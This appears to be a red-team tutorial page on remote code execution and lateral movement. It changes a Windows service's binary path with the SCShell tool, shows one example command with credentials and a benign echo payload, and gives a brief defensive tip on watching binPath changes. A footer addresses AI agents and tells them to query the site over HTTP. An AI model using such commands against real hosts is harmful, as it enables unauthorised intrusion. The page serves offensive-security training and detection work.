# Lateral Movement via Service Configuration Manager It's possible to execute commands on a remote host by abusing service configuration manager by changing the service binpath to your malicious command and restarting the service so your payload gets executed - this is all automated by a nice tool [SCShell](https://github.com/Mr-Un1k0d3r/SCShell) ## Execution Scshell expects the following arguments: target, service, payload, username, domain, password: {% tabs %} {% tab title="attacker\@target" %} ``` .\scshell.exe ws01 XblAuthManager "C:\windows\system32\cmd.exe /c echo 'lateral hello' > c:\temp\lat.txt" spotless offense 123456 ``` {% endtab %} {% endtabs %} ![](/files/-Lttzm9ivnlPHHKxQVgR) ## Considerations From the defensive side, you may want to consider about monitoring services that change their binPaths "too often" as this may not be normal in your environment, especially if the binPath is "very" different ([Levenshtein](https://www.google.com/search?q=levenshtein+distance\&oq=levensht\&aqs=chrome.1.69i57j0l5.2647j0j7\&sourceid=chrome\&ie=UTF-8)) to the previously known good value and if the service configuration is being changed over the network: ![](/files/-Ltu1lvRPsIZAF8PH-j9) ## References {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.ired.team/offensive-security/lateral-movement/lateral-movement-abusing-service-configuration-manager.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.